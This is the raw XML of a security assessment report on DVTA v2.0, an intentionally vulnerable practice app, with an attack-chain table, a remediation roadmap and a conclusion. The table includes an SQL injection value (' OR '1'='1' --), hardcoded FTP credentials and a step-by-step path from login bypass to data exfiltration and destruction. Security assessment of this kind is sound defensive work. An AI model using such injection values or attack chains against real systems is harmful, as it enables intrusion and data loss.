            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> password field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D">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Login.cs:85</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1E">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F2</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1F">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4</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0">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Admin Access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1">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SQLi forces isadmin=1 </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> Admin() panel</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2">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Login.cs:91-101</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3">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F5</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24">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5</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25">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IDOR</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26">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reg add /v email </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> viewExpenses(victim)</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27">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Main.cs:103-104</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28">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F8</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9">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6</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A">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FTP Pivot</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B">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Admin FTP: hardcoded dvta/p@ssw0rd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C">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Admin.cs:43</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2D">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F3+F6</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2E">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7</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2F">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Exfil</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30">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getExpensesOfAll() </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> admin.csv via FTP</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31">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Admin.cs:36,57</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fafafa" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000232">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F5+F6</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33">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8</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34">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Destruction</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35">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clearExpenses(' OR '1'='1' --)</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36">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0f3460"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DBAccessClass.cs:161</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eef2f6" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">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F1+F8</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">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239">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3A">
      <w:pPr>
        <w:spacing w:after="160" w:before="440" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023B">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Priorities are based on exploitability and business impact. The three IMMEDIATE items are independently exploitable by an unauthenticated attacker and must be resolved within 7 days.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023C">
      <w:pPr>
        <w:spacing w:after="0" w:before="8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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table40"/>
        <w:tblW w:w="9026.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-100.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="700"/>
        <w:gridCol w:w="5626"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="900"/>
            <w:gridCol w:w="700"/>
            <w:gridCol w:w="5626"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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3D">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Priority</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3E">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CWE</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3F">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CVSS</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16213e" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000240">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8"/>
                <w:szCs w:val="18"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation Action</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c0392b" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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IMMEDIATE &lt;=7d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CWE-89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3">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9.8</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4">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Parameterized queries (SqlParameter) for all 5 DB methods</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c0392b" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000245">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IMMEDIATE &lt;=7d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6">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CWE-798</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7">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9.8</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8">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Remove hardcoded "dvta"/"p@ssw0rd" from Admin.cs; use vault</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c0392b" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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IMMEDIATE &lt;=7d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A">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CWE-321</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B">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c0392b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">9.1</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C">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Move AESKEY and IV out of config — use Windows DPAPI or vault</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67e22" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024D">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HIGH &lt;=30d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E">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CWE-312</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4F">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e67e22"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8.4</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0">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Remove password from registry; use session token only</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67e22" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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HIGH &lt;=30d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CWE-284</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3">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e67e22"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8.8</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4">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Server-side role validation; signed JWT with role claim</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67e22" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000255">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HIGH &lt;=30d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6">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CWE-319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7">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e67e22"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8.1</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8">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Replace WebClient FTP with SFTP (SSH.NET) or FTPS</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67e22" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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HIGH &lt;=30d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A">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CWE-532</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B">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e67e22"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7.5</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C">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Remove all Console.WriteLine credential output</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67e22" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025D">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HIGH &lt;=30d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E">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CWE-639</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5F">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e67e22"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7.5</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0">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Session token for identity; never trust registry for authz</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e67e22" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">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HIGH &lt;=30d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2">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CWE-384</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3">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e67e22"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7.3</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4">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Replace registry session with signed server-issued token</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39c12" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000265">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MEDIUM &lt;=90d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6">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CWE-307</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7">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f39c12"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3</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8">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Account lockout after 5 failures; exponential backoff</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="f39c12" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000269">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fdfefe"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM &lt;=90d</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A">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="16213e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-316</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B">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="f39c12"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6.5</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="d5d8dc" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:tcMar>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026C">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1a1a2e"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SecureString + Marshal.ZeroFreeGlobalAllocAnsi after use</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
      <w:pPr>
        <w:spacing w:after="0" w:before="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6F">
      <w:pPr>
        <w:spacing w:after="160" w:before="440" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="16213e"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000270">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This assessment identified twelve confirmed vulnerabilities across DVTA v2.0 based exclusively on decompiled source code evidence. Six findings were not present in prior assessments and were discovered through static analysis of the real application codebase: plaintext password in registry (CWE-312), AES key co-location (CWE-321), console credential logging (CWE-532), insecure registry session (CWE-384), absence of brute force protection (CWE-307), and anti-debugging evasion.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000271">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72">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The five Critical findings collectively provide a complete unauthenticated attack path: SQL injection bypasses authentication, the client-side admin check grants the admin panel, hardcoded FTP credentials enable pivot to the file server, and the unrestricted clearExpenses() call enables data destruction. All steps are confirmed in source code with exact line references.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
      <w:pPr>
        <w:spacing w:after="0" w:before="10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74">
      <w:pPr>
        <w:spacing w:after="60" w:before="6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Fonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation of the three IMMEDIATE items (CWE-89, CWE-798, CWE-321) substantially reduces the attack surface. The remaining findings should be addressed on the HIGH and MEDIUM timelines before any network-connected deployment.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000275">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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76">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="24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Courier New"/>
  <w:font w:name="Aref Ruqaa">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7.png"/></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArefRuqaa-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArefRuqaa-bold.ttf"/><Relationship Id="rId3"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C65p0LxeFhV6n/1hWROFNqA6fA==">CgMxLjA4AHIhMWJYb01feXRaWVozM2Rwd2lkOEdDMy1wbUdhdE1KYTRx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